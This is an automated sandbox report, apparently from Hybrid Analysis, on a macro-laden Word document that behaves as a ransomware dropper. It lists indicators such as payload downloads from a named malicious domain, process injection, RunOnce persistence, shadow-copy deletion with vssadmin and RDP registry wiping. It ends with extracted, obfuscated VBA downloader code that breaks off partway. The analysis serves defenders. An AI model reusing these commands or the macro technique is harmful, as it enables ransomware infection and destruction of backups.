5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.docx.000
This report is generated from a file or URL submitted to this webservice on July 26th 2017 18:31:52 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v6.80 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
-
Contains a remote desktop related string
Sets terminal service related keys (often RDP related) - Ransomware
-
Deletes volume snapshots (often used by ransomware)
The analysis extracted a known ransomware file - Persistence
-
Modifies auto-execute functionality by setting/creating a value in the registry
Spawns a lot of processes
Writes data to a remote process - Fingerprint
-
Reads the active computer name
Reads the cryptographic machine GUID - Evasive
- Possibly checks for the presence of an Antivirus engine
- Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 21
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET TROJAN Known Malicious Doc Downloading Payload Dec 06 2016" (SID: 2023583, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 6/65 reputation engines marked "http://e-snhv.com" as malicious (9% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 11/59 Antivirus vendors marked sample as malicious (18% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 11/59 Antivirus vendors marked sample as malicious (18% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /hjbgtg67 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding: gzip, deflate
Host: e-snhv.com
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
10/62 Antivirus vendors marked spawned process "hurds8.exe" (PID: 3492) as malicious (classified as "ML.Attribute" with 16% detection rate)
10/62 Antivirus vendors marked spawned process "hurds8.exe" (PID: 3448) as malicious (classified as "ML.Attribute" with 16% detection rate)
10/62 Antivirus vendors marked spawned process "hurds8.exe" (PID: 3532) as malicious (classified as "ML.Attribute" with 16% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
Tries to delete registry keys using reg.exe
- details
-
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Document spawns new processes
-
Installation/Persistance
-
Sets thread context in a remote process (often injection or process hollowing)
- details
- "hurds8.exe" set thread context in remote process "%TEMP%\hurds8.exe" (PID 00000dcc)
- source
- API Call
- relevance
- 10/10
-
Writes data to a remote process
- details
-
"WINWORD.EXE" wrote 32 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 2064)
"WINWORD.EXE" wrote 52 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 2064)
"WINWORD.EXE" wrote 4 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 2064)
"hurds8.exe" wrote 32 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 536)
"hurds8.exe" wrote 52 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 536)
"hurds8.exe" wrote 4 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 536)
"hurds8.exe" wrote 32 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
"hurds8.exe" wrote 52 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
"hurds8.exe" wrote 4 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
"hurds8.exe" wrote 1024 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
"hurds8.exe" wrote 75776 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
"hurds8.exe" wrote 23552 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
"hurds8.exe" wrote 5120 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
"hurds8.exe" wrote 10752 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236) - source
- API Call
- relevance
- 6/10
-
Sets thread context in a remote process (often injection or process hollowing)
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "61.106.62.37" (ASN: , Owner: ): ...
URL: http://e-snhv.com/ (AV positives: 6/65 scanned on 07/25/2017 18:00:56)
URL: http://e-snhv.com/83b7bf3/ (AV positives: 7/65 scanned on 07/22/2017 13:45:20)
URL: http://e-snhv.com/38rh76f/ (AV positives: 7/65 scanned on 07/22/2017 10:04:31)
URL: http://e-snhv.com/6gfh33/ (AV positives: 5/65 scanned on 07/21/2017 15:51:52)
URL: http://e-snhv.com/38rh76f (AV positives: 8/65 scanned on 07/20/2017 06:15:39)
File SHA256: 6d5ed92cf8897c97293d7da272adc2f9b3c9f6bf4c4d568acadc4b8c10170b37 (AV positives: 1/58 scanned on 07/19/2017 15:08:56)
File SHA256: 68c7b7d97fada3f558a54260491ffe1ce77add158f8a91c2599432f13718b807 (AV positives: 5/56 scanned on 06/06/2017 03:56:43)
File SHA256: 98f0f68feb0495de61add43c717ccb462fbe46bc977bb295c688bd4511272b55 (AV positives: 5/56 scanned on 06/04/2017 20:48:24) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Ransomware/Banking
-
Deletes volume snapshots (often used by ransomware)
- details
-
Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process) - source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a known ransomware file
- details
- Found dropped filename "_ReadMe_.txt" which has been seen in the context of ransomware (Indicator: README_.txt)
- source
- Binary File
- relevance
- 5/10
-
Deletes volume snapshots (often used by ransomware)
-
Remote Access Related
-
Sets terminal service related keys (often RDP related)
- details
-
"reg.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS")
"reg.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS"; Key: "(DEFAULT)"; Value: "0000") - source
- Registry Access
- relevance
- 3/10
-
Sets terminal service related keys (often RDP related)
-
System Destruction
-
Deletes volume snapshots (often used by ransomware)
- details
-
Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process) - source
- Monitored Target
- relevance
- 10/10
-
Deletes volume snapshots (often used by ransomware)
-
System Security
-
Tries to delete registry keys using reg.exe
- details
-
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Tries to delete registry keys using reg.exe
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Spawns a lot of processes
- details
- Spawned process "WINWORD.EXE" with commandline "/n "C:\5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.doc" (Show Process), Spawned process "hurds8.exe" (Show Process), Spawned process "hurds8.exe" with commandline "-l" (Show Process), Spawned process "hurds8.exe" (Show Process), Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t6D8E.tmp.bat" (Show Process), Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process), Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process), Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process), Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""" (Show Process), Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process), Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t773C.tmp.bat" (Show Process), Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\tmp7751.tmp.bat" (Show Process), Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process), Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process), Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process), Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""" (Show Process), Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 19
-
Anti-Detection/Stealthyness
-
Possibly checks for the presence of an Antivirus engine
- details
-
"COMODO" (Indicator: "comodo")
"Kaspersky Lab" (Indicator: "kaspersky")
"McAfee" (Indicator: "mcafee")
"Avira" (Indicator: "avira")
"Avast" (Indicator: "avast")
"Symantec" (Indicator: "symantec") - source
- File/Memory
- relevance
- 3/10
-
Possibly checks for the presence of an Antivirus engine
-
Cryptographic Related
-
Found a cryptographic related string
- details
- "DES" (Indicator: "des"; File: "00014991-00003492.00000000.15495.00401000.00000040.mdmp")
- source
- File/Memory
- relevance
- 10/10
-
Found a cryptographic related string
-
Environment Awareness
-
Reads the active computer name
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"hurds8.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"vssadmin.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
-
Reads the cryptographic machine GUID
- details
-
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"hurds8.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"vssadmin.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Reads the active computer name
-
Exploit/Shellcode
-
Found URL in decoded VBA string
- details
-
Heuristic match: "e-snhv.com"
Heuristic match: "hjbgtg67CHAStrominguatedrop.org"
Heuristic match: "hjbgtg67CHASswangroup.net"
Heuristic match: "Playe.rs"
Heuristic match: "TileG.et" - source
- File/Memory
- relevance
- 10/10
-
Found URL in decoded VBA string
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 6/65 reputation engines marked "http://e-snhv.com" as malicious (9% detection rate)
- source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
General
-
Contains ability to find and load resources of a specific module
- details
-
FindResourceW@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
FindResourceW@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%TEMP%\hurds8.exe", Handle: )
"hurds8.exe" is creating a new process (Name: "%TEMP%\hurds8.exe", Handle: )
"hurds8.exe" is creating a new process (Name: "%TEMP%\hurds8.exe", Handle: )
"hurds8.exe" is creating a new process (Handle: )
"hurds8.exe" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: l) - source
- API Call
- relevance
- 8/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
-
"hurds8.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE")
"hurds8.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE"; Key: "CERTIFICATESCHECK"; Value: "%APPDATA%\Microsoft\SystemCertificates\My\Certificates\hurds8.exe") - source
- Registry Access
- relevance
- 8/10
-
Creates new processes
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
- source
- Network Traffic
- relevance
- 10/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
-
Ransomware/Banking
-
The analysis extracted file with a known ransomware suffix
- details
- Found dropped filename "dictionary.alcatel-lucent.aaa" which has been seen in the context of ransomware (Indicator: .aaa)
- source
- Binary File
- relevance
- 10/10
-
The input sample dropped very many files
- details
- The input sample dropped 2000 files (often an indicator for ransomware)
- source
- Binary File
- relevance
- 5/10
-
The analysis extracted file with a known ransomware suffix
-
Remote Access Related
-
Changes the attributes of the Desktop.rdp configuration file
- details
-
Process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process)
Process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process) - source
- Monitored Target
- relevance
- 10/10
-
Contains a remote desktop related string
- details
- "^;Vgto@Wa&}FADbk4C&+Dl2RR<e vnc`eN" (Indicator for product: Generic VNC)
- source
- File/Memory
- relevance
- 10/10
-
Changes the attributes of the Desktop.rdp configuration file
-
Spyware/Information Retrieval
-
Contains ability to enumerate processes/modules/threads
- details
- CreateToolhelp32Snapshot@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Contains ability to enumerate processes/modules/threads
-
System Security
-
Modifies proxy settings
- details
-
"hurds8.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"hurds8.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"hurds8.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "User-Agent" which indicates: "May download files from the Internet"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings" - source
- Static Parser
- relevance
- 10/10
-
Opens many files with write access (often indicator for full-system infection)
- details
- "hurds8.exe" opens more than 500 files with write access
- source
- API Call
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Informative 30
-
Anti-Detection/Stealthyness
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "WINWORD.EXE" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetSystemTimeAsFileTime@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
- details
-
GetVersionExA@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
GetVersionExA@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the system locale
- details
-
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Possibly tries to detect the presence of a debugger
- details
-
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3492) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3448) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream)
GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Reads the registry for installed applications
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA102")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA103") - source
- Registry Access
- relevance
- 10/10
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
- "e-snhv.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "61.106.62.37:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"C:\Cpp\VS17\pchild10\Release\pchild10.pdb"
"$JC3v<!f:\CB\11X_Main\Acrobat\Installers\AbcpyDll\Release\AbcpyDll.pdbl|@l@4@L4DPL@4ll@@ (@Xhp@X@44@@P`4|@|PH4H@i*s+0fz{Ns>mD"`i"""""D4"xYc"""(@Lh)8H356"
":JB \uicf:\CB\11X_Main\Acrobat\Installers\AcroTgts\Release\AcroTgts.pdb@@(4DL(@4P|P@|l@@lXht@X@@@P\@@SN]OPPE^:^"P""("T,"p~""",P"X(LPZLlFcSceg%gj%nqs sttTPZ@"!%_fQg=6K [}Znpe9>]"0?_?iPed&ct!wXgjPZ#%!4!Mc98(U'L%FQ9u"*%B@3$" - source
- File/Memory
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: "Function Test_NormalUse_XPersist(aDocumentProperties) As Boolean
On Error GoTo Test_NormalUse_XPersist_Error
InfoMes.sage ("Test_NormalUse_XPersist ... [start]")
aDocumentProperties.read (cTestPath + "TestDebug_in.sdw")
ShowProp.erties (aDocumentProperties)
aDocumentProperties.Write (cTestPath + "TestDebug_Out.sdw")
aDocumentProperties.read (cTestPath + "TestDebug_Out.sdw")
ShowPro.perties (aDocumentProperties)
On Error GoTo 0
InfoMes.sage ("Test_NormalUse_XPersist ... [ende]")
Test_NormalUse_XPersist = cOK
Exit Function
Test_NormalUse_XPersist_Error:
On Error GoTo 0
ErrorM.essage ("Test_NormalUse_XPersist ... [Error]")
Test_NormalUse_XPersist = cError
Exit Function
End Function
Sub Document_Open()
BladeRunner_Fish = 0
HMBCP "Test_NormalUse_XPersist_Error"
End Sub"
File "Module2.bas" (Streampath: "VBA/Module2") has code: "Public MarkusPils() As String
Public BladeRunner_4 As String
Public Const BladeRunner_System = "User-Agent"
Public SubProperty As Object
Public BladeRunner_VEAM As Object
Public BladeRunner_Fish As Integer
Public AlertN() As String
Public AlertNE As String
Public BladeRunner_PokerFace As Variant
Public BladeRunner_aifde As Object
Public BladeRunner_FLAME As String
Public BladeRunner_avatar As Object
Public smbi As String
Public BladeRunner_2 As String
Public Const Quubo = 0
Public Stocke As Integer
Public BladeRunner_Project As String
Public VertikName As String
Public BladeRunner_PathTo2 As String
Public CofeeShop As Object
Public Sub AnimTransferMap(Caption As String, IsMapTransfer As Boolean)
Dim xt As Integer, yt As Integer, PValue As Integer, I As Integer, L As Long
Set BladeRunner_avatar = CreateObject(AlertN(3))
Shtefin = Replace(Replace("e-snhv.cLLOO\hjbgtg67CHAStrLLOOinguatedrop.org\af\hjbgtg67CHASswangroup.net\hjbgtg67", "LLOO", "om"), "\", "/")
MarkusPils = Split(Shtefin, F3.CHAS.Caption)
Set SubProperty = CreateObject(AlertN(1))
Set BladeRunner_aifde = CreateObject(AlertNE)
Set BladeRunner_VEAM = BladeRunner_avatar.Environment(AlertN(4))
Exit Sub
xt = CenterX - 77
yt = CenterY - 10
If IsMapTransfer Then
PValue = (ResX - 88) \ 12
L = UBound(RMData) \ PValue
For I = 1 To PValue
If I * L >= RMCount Then
Optio.nGFX "selectfalse", 32 + I * 12, CenterY + 200
Else
Optio.nGFX "selecttrue", 32 + I * 12, CenterY + 200
End If
Next
End If
End Sub
Public Sub AnimPowerup(pwr As Integer)
Dim rBuff As RECT
Dim ExX As Long, ExY As Long
If NewGTC - PowerFrameT(pwr) > 100 Then
PowerFrame(pwr) = PowerFrame(pwr) + 1
If PowerUp(pwr) = 1 Then
If PowerFrame(pwr) > 5 Then PowerFrame(pwr) = 0
Else
If PowerFrame(pwr) > 11 Then PowerFrame(pwr) = 0
End If
PowerFrameT(pwr) = NewGTC
End If
If PowerEffect(pwr) = 2 Then
If NewGTC - PowerTick(pwr) > 50 Then
PowerTick(pwr) = NewGTC
PowerEffect(pwr) = 3
Else
Exit Sub
End If
ElseIf PowerEffect(pwr) = 3 Then
If NewGTC - PowerTick(pwr) > 50 Then
PowerTick(pwr) = NewGTC
PowerEffect(pwr) = 2
Exit Sub
End If
End If
ExX = PowerX(pwr)
ExY = PowerY(pwr)
ExX = ExX - MeX: ExY = ExY - MeY
rBuff.Top = 355 + (PowerUp(pwr) - 1) * 24
rBuff.Bottom = rBuff.Top + 24
rBuff.Left = PowerFrame(pwr) * 24
rBuff.Right = rBuff.Left + 24
If ExX < 0 Then rBuff.Left = rBuff.Left + Abs(ExX): ExX = 0
If ExY < 0 Then rBuff.Top = rBuff.Top + Abs(ExY): ExY = 0
If ExX > ResX - 24 Then rBuff.Right = rBuff.Right - (ExX - (ResX - 24)): ExX = ResX - 24 + (ExX - (ResX - 24))
If ExY > ResY - 24 Then rBuff.Bottom = rBuff.Bottom - (ExY - (ResY - 24)): ExY = ResY - 24 + (ExY - (ResY - 24))
